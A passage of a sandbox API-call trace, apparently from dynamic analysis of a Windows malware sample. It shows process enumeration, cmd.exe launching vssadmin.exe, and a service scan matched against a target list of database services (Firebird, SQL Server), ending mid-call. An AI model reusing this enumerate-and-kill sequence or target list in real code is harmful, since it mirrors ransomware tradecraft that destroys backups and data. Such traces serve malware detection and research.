Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.419] lstrlenW (lpString="svchost.exe") returned 11 [0223.419] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.419] lstrlenW (lpString="svchost.exe") returned 11 [0223.419] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.420] lstrlenW (lpString="svchost.exe") returned 11 [0223.420] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.421] lstrlenW (lpString="svchost.exe") returned 11 [0223.421] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.421] lstrlenW (lpString="svchost.exe") returned 11 [0223.422] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.422] lstrlenW (lpString="svchost.exe") returned 11 [0223.422] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.423] lstrlenW (lpString="svchost.exe") returned 11 [0223.423] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.424] lstrlenW (lpString="svchost.exe") returned 11 [0223.424] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.425] lstrlenW (lpString="svchost.exe") returned 11 [0223.425] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.425] lstrlenW (lpString="spoolsv.exe") returned 11 [0223.425] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.426] lstrlenW (lpString="svchost.exe") returned 11 [0223.426] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.427] lstrlenW (lpString="svchost.exe") returned 11 [0223.427] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0223.428] lstrlenW (lpString="audiodg.exe") returned 11 [0223.428] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.428] lstrlenW (lpString="sihost.exe") returned 10 [0223.428] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.429] lstrlenW (lpString="svchost.exe") returned 11 [0223.429] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.430] lstrlenW (lpString="taskhostw.exe") returned 13 [0223.430] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.431] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0223.431] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0223.431] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0223.431] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.432] lstrlenW (lpString="explorer.exe") returned 12 [0223.432] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0223.433] lstrlenW (lpString="Memory Compression") returned 18 [0223.433] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.433] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0223.434] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.434] lstrlenW (lpString="SearchUI.exe") returned 12 [0223.434] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.435] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0223.435] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.436] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0223.436] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0223.436] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0223.436] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0223.437] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0223.437] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.438] lstrlenW (lpString="conhost.exe") returned 11 [0223.438] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0223.439] lstrlenW (lpString="roof competitive.exe") returned 20 [0223.439] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0223.440] lstrlenW (lpString="trustees.exe") returned 12 [0223.440] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0223.440] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0223.440] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0223.441] lstrlenW (lpString="isbn.exe") returned 8 [0223.441] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0223.442] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0223.442] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0223.443] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0223.443] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0223.443] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0223.443] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0223.444] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0223.444] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0223.445] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0223.445] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0223.445] lstrlenW (lpString="playstation iraq.exe") returned 20 [0223.445] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0223.446] lstrlenW (lpString="harbor.exe") returned 10 [0223.446] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0223.447] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0223.447] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0223.448] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0223.448] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0223.448] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0223.448] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0223.449] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0223.449] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0223.450] lstrlenW (lpString="larent.exe") returned 10 [0223.450] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0223.451] lstrlenW (lpString="stereo.exe") returned 10 [0223.451] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0223.451] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0223.451] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0223.452] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0223.452] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0223.453] lstrlenW (lpString="state.exe") returned 9 [0223.453] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0223.454] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0223.454] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.455] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0223.455] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.456] lstrlenW (lpString="taskhostw.exe") returned 13 [0223.456] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0223.457] lstrlenW (lpString="sppsvc.exe") returned 10 [0223.457] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.458] lstrlenW (lpString="svchost.exe") returned 11 [0223.458] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0223.459] lstrlenW (lpString="Pg.exe") returned 6 [0223.459] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0223.459] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0223.459] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.460] lstrlenW (lpString="conhost.exe") returned 11 [0223.460] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0223.461] lstrlenW (lpString="cmd.exe") returned 7 [0223.461] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.462] lstrlenW (lpString="conhost.exe") returned 11 [0223.462] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0223.463] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0223.463] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0223.463] lstrlenW (lpString="conhost.exe") returned 11 [0223.463] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0223.464] lstrlenW (lpString="vssadmin.exe") returned 12 [0223.464] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0223.465] CloseHandle (hObject=0x45c) returned 1 [0223.465] Sleep (dwMilliseconds=0x1f4) [0223.970] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x236bcd8 [0223.971] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 0 [0223.971] GetLastError () returned 0xea [0223.971] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x201e) returned 0x2372d70 [0223.971] EnumServicesStatusExW (in: hSCManager=0x236bcd8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x2372d70, cbBufSize=0x201e, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x2372d70, pcbBytesNeeded=0x291ff3c, lpServicesReturned=0x291ff54, lpResumeHandle=0x0) returned 1 [0223.972] CloseServiceHandle (hSCObject=0x236bcd8) returned 1 [0223.972] lstrlenW (lpString="Appinfo") returned 7 [0223.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0223.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0223.972] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0223.972] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0223.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0223.972] lstrlenW (lpString="AppXSvc") returned 7 [0223.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0223.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0223.972] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0223.972] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0223.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0223.972] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0223.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0223.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0223.972] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0223.972] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0223.973] lstrlenW (lpString="Audiosrv") returned 8 [0223.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0223.973] lstrlenW (lpString="BFE") returned 3 [0223.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0223.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0223.973] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0223.973] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0223.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0223.973] lstrlenW (lpString="BITS") returned 4 [0223.973] lstrcmpiW 